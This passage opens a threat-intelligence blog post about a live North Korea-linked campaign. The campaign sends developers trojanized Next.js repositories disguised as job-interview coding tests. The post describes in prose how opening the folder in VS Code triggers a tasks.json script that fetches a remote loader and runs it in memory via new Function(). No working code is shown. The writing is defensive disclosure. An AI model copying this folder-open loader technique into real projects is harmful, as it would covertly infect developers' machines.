new Function(), New Threat: Inside a Live DPRK Developer-Targeting Campaign | Intercept Cell

We acquired live malware source code from a DPRK-linked campaign targeting software developers through trojanized Next.js repositories disguised as job interview coding assessments. Two C2 servers remain operational. The remote code execution mechanism hides in plain sight: new Function(\

Two days after we published our analysis of a trojanized CUDA toolkit linked to DPRK threat actors, we found the same operational cluster has pivoted. The new vector: fake Next.js coding assessments sent to developers during job interviews. We pulled the actual malware loader source code off live staging infrastructure, confirmed two active command-and-control servers, and mapped the full attack chain. The campaign is still running. Microsoft Defender published a report on February 24 identifying malicious repositories on Bitbucket posing as legitimate Next.js projects. We independently acquired artifacts from the live infrastructure and confirmed active C2 servers. Five Vercel-hosted staging domains remained live at time of analysis, including endpoints actively serving malware loader code to anyone who requested it. The campaign uses recruiting-themed lures. A developer receives a repository framed as a technical assessment or interview project. The repo looks legitimate. It builds. It runs. It also phones home to Pyongyang. The attackers embedded three independent execution triggers into each repository, ensuring infection regardless of how the developer interacts with the code: A .vscode/tasks.json file configured with runOn: \"folderOpen\" executes a Node script the moment the developer opens the project folder in VS Code and clicks Trust. The script fetches a loader from a Vercel staging domain and executes it in memory.